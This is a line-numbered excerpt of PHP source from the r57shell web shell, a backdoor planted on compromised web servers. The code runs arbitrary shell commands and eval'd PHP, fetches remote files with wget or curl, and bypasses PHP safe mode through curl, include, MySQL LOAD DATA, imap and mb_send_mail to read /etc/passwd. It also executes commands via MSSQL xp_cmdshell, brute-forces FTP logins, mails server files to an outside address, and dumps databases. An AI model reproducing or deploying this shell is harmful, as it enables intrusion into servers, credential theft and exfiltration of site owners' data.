1766else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1767@copy($HTTP_POST_FILES['userfile']['tmp_name'],
1768 $_POST['dir']."/".$nfn)
1769 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1770}
1771if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1772{
1773 switch($_POST['with'])
1774 {
1775 case wget:
1776 $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1777 break;
1778 case fetch:
1779 $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1780 break;
1781 case lynx:
1782 $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1783 break;
1784 case links:
1785 $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1786 break;
1787 case GET:
1788 $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1789 break;
1790 case curl:
1791 $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1792 break;
1793 }
1794}
1795if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
1796 {
1797 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1798 if(empty($ftp_port)) { $ftp_port = 21; }
1799 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1800 if(!$connection) { err(3); }
1801 else
1802 {
1803 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
1804 else
1805 {
1806 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
1807 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
1808 }
1809 }
1810 @ftp_close($connection);
1811 $_POST['cmd'] = "";
1812 }
1813if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
1814 {
1815 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1816 if(empty($ftp_port)) { $ftp_port = 21; }
1817 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1818 if(!$connection) { err(3); $_POST['cmd'] = ""; }
1819 else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
1820 @ftp_close($connection);
1821 }
1822echo $table_up3;
1823if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
1824else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
1825echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
1826if($safe_mode)
1827{
1828 switch($_POST['cmd'])
1829 {
1830 case 'safe_dir':
1831 $d=@dir($dir);
1832 if ($d)
1833 {
1834 while (false!==($file=$d->read()))
1835 {
1836 if ($file=="." || $file=="..") continue;
1837 @clearstatcache();
1838 list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
1839 if(!$unix){
1840 echo date("d.m.Y H:i",$mtime);
1841 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
1842 }
1843 else{
1844 $owner = @posix_getpwuid($uid);
1845 $grgid = @posix_getgrgid($gid);
1846 echo $inode." ";
1847 echo perms(@fileperms($file));
1848 printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1849 echo date("d.m.Y H:i ",$mtime);
1850 }
1851 echo "$file\n";
1852 }
1853 $d->close();
1854 }
1855 else echo $lang[$language._text29];
1856 break;
1857 case 'test1':
1858 $ci = @curl_init("file://".$_POST['test1_file']."");
1859 $cf = @curl_exec($ci);
1860 echo $cf;
1861 break;
1862 case 'test2':
1863 @include($_POST['test2_file']);
1864 break;
1865 case 'test3':
1866 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
1867 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
1868 if($db)
1869 {
1870 if(@mysql_select_db($_POST['test3_md'],$db))
1871 {
1872 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1873 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
1874 @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
1875 $r = @mysql_query("SELECT * FROM temp_r57_table");
1876 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
1877 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1878 }
1879 else echo "[-] ERROR! Can't select database";
1880 @mysql_close($db);
1881 }
1882 else echo "[-] ERROR! Can't connect to mysql server";
1883 break;
1884 case 'test4':
1885 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
1886 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
1887 if($db)
1888 {
1889 if(@mssql_select_db($_POST['test4_md'],$db))
1890 {
1891 @mssql_query("drop table r57_temp_table",$db);
1892 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
1893 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
1894 $res = mssql_query("select * from r57_temp_table",$db);
1895 while(($row=@mssql_fetch_row($res)))
1896 {
1897 echo $row[0]."\r\n";
1898 }
1899 @mssql_query("drop table r57_temp_table",$db);
1900 }
1901 else echo "[-] ERROR! Can't select database";
1902 @mssql_close($db);
1903 }
1904 else echo "[-] ERROR! Can't connect to MSSQL server";
1905 break;
1906 case 'test5':
1907 if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
1908 $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
1909 @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
1910 $lines = file ('/tmp/mb_send_mail');
1911 foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
1912 break;
1913 case 'test6':
1914 $stream = @imap_open('/etc/passwd', "", "");
1915 $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
1916 for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
1917 @imap_close($stream);
1918 break;
1919 case 'test7':
1920 $stream = @imap_open($_POST['test7_file'], "", "");
1921 $str = @imap_body($stream, 1);
1922 echo $str;
1923 @imap_close($stream);
1924 break;
1925 case 'test8':
1926 if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
1927 else echo $lang[$language.'_text119'];
1928 break;
1929 }
1930}
1931else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
1932 $cmd_rep = ex($_POST['cmd']);
1933 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
1934 else { echo @htmlspecialchars($cmd_rep)."\n"; }}
1935if ($_POST['cmd']=="ftp_brute")
1936 {
1937 $suc = 0;
1938 foreach($users as $user)
1939 {
1940 $connection = @ftp_connect($ftp_server,$ftp_port,10);
1941 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
1942 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
1943 @ftp_close($connection);
1944 }
1945 echo "\r\n-------------------------------------\r\n";
1946 $count = count($users);
1947 if(isset($_POST['reverse'])) { $count *= 2; }
1948 echo $lang[$language.'_text97'].$count."\r\n";
1949 echo $lang[$language.'_text98'].$suc."\r\n";
1950 }
1951if ($_POST['cmd']=="php_eval"){
1952 $eval = @str_replace("<?","",$_POST['php_eval']);
1953 $eval = @str_replace("?>","",$eval);
1954 @eval($eval);}
1955if ($_POST['cmd']=="mysql_dump")
1956 {
1957 if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
1958 $sql = new my_sql();
1959 $sql->db = $_POST['db'];
1960 $sql->host = $_POST['db_server'];
1961 $sql->port = $_POST['db_port'];
1962 $sql->user = $_POST['mysql_l'];
1963 $sql->pass = $_POST['mysql_p'];
1964 $sql->base = $_POST['mysql_db'];
1965 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
1966 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
1967 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
1968 else {
1969 if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
1970 else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
1971 else { echo "[-] ERROR! Can't write in dump file"; }
1972 }
1973 }
1974echo "</textarea></div>";
1975echo "</b>";
1976echo "</td></tr></table>";
1977echo "<table width=100% cellpadding=0 cellspacing=0>";
1978function div_title($title, $id)
1979{
1980 return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
1981}
1982function div($id)
1983 {
1984 if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
1985 return '<div id="'.$id.'">';
1986 }
1987if(!$safe_mode){
1988echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
1989echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
1990echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
1991echo $te.'</div>'.$table_end1.$fe;
1992}
1993else{
1994echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
1995echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
1996echo $te.'</div>'.$table_end1.$fe;
1997}
1998echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
1999echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2000echo $te.'</div>'.$table_end1.$fe;
2001if($safe_mode){
2002echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
2003echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2004echo $te.'</div>'.$table_end1.$fe;
2005}
2006if($safe_mode && $unix){
2007echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
2008echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2009echo $te.'</div>'.$table_end1.$fe;
2010}
2011if(!$safe_mode){
2012$aliases2 = '';
2013foreach ($aliases as $alias_name=>$alias_cmd)
2014 {
2015 $aliases2 .= "<option>$alias_name</option>";
2016 }
2017echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
2018echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2019echo $te.'</div>'.$table_end1.$fe;
2020}
2021echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
2022echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2023echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2024echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2025echo $te.'</div>'.$table_end1.$fe;
2026if(!$safe_mode && $unix){
2027echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
2028echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2029echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2030echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2031echo $te.'</div>'.$table_end1.$fe;
2032}
2033echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
2034echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
2035echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
2036echo "</textarea>";
2037echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2038echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2039echo "</div></div></font>";
2040echo $table_end1.$fe;
2041if($safe_mode&&$curl_on)
2042{
2043echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
2044echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2045echo $te.'</div>'.$table_end1.$fe;
2046}
2047if($safe_mode)
2048{
2049echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
2050echo "<table class=table1 width=100% align=center>";
2051echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2052echo $te.'</div>'.$table_end1.$fe;
2053}
2054if($safe_mode&&$mysql_on)
2055{
2056echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
2057echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2058echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2059echo $te.'</div>'.$table_end1.$fe;
2060}
2061if($safe_mode&&$mssql_on)
2062{
2063echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
2064echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2065echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2066echo $te.'</div>'.$table_end1.$fe;
2067}
2068if($safe_mode&&$unix&&function_exists('mb_send_mail')){
2069echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
2070echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2071echo $te.'</div>'.$table_end1.$fe;
2072}
2073if($safe_mode&&function_exists('imap_list')){
2074echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
2075echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2076echo $te.'</div>'.$table_end1.$fe;
2077}
2078if($safe_mode&&function_exists('imap_body')){
2079echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
2080echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2081echo $te.'</div>'.$table_end1.$fe;
2082}
2083if($safe_mode)
2084{
2085echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
2086echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
2087echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2088echo $te.'</div>'.$table_end1.$fe;
2089}
2090if(@ini_get('file_uploads')){
2091echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2092echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
2093echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
2094echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2095echo $te.'</div>'.$table_end1.$fe;
2096}
2097if(!$safe_mode&&$unix){
2098echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
2099echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2100echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2101echo $te.'</div>'.$table_end1.$fe;
2102}
2103echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
2104echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
2105$arh = $lang[$language.'_text92'];
2106if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
2107if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
2108if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
2109echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2110echo $te.'</div>'.$table_end1.$fe;
2111if(@function_exists("ftp_connect")){
2112echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2113echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
2114echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2115echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2116echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2117echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
2118echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2119echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2120echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
2121echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2122echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
2123echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
2124echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
2125echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
2126echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2127echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
2128echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
2129echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
2130echo $te."</td>".$fe."</tr></div></table>";
2131}
2132if($unix && @function_exists("ftp_connect")){
2133echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
2134echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2135echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
2136echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
2137echo $te.'</div>'.$table_end1.$fe;
2138}
2139if(@function_exists("mail")){
2140echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2141echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
2142echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
2143echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2144echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
2145echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
2146echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2147echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2148echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
2149echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
2150echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
2151echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
2152echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
2153echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
2154echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
2155echo $te."</td>".$fe."</tr></div></table>";
2156}
2157if($mysql_on||$mssql_on||$pg_on||$ora_on)
2158{
2159$select = '<select name=db>';
2160if($mysql_on) $select .= '<option>MySQL</option>';
2161if($mssql_on) $select .= '<option>MSSQL</option>';
2162if($pg_on) $select .= '<option>PostgreSQL</option>';
2163if($ora_on) $select .= '<option>Oracle</option>';
2164$select .= '</select>';
2165echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
2166echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
2167echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2168echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2169echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2170echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
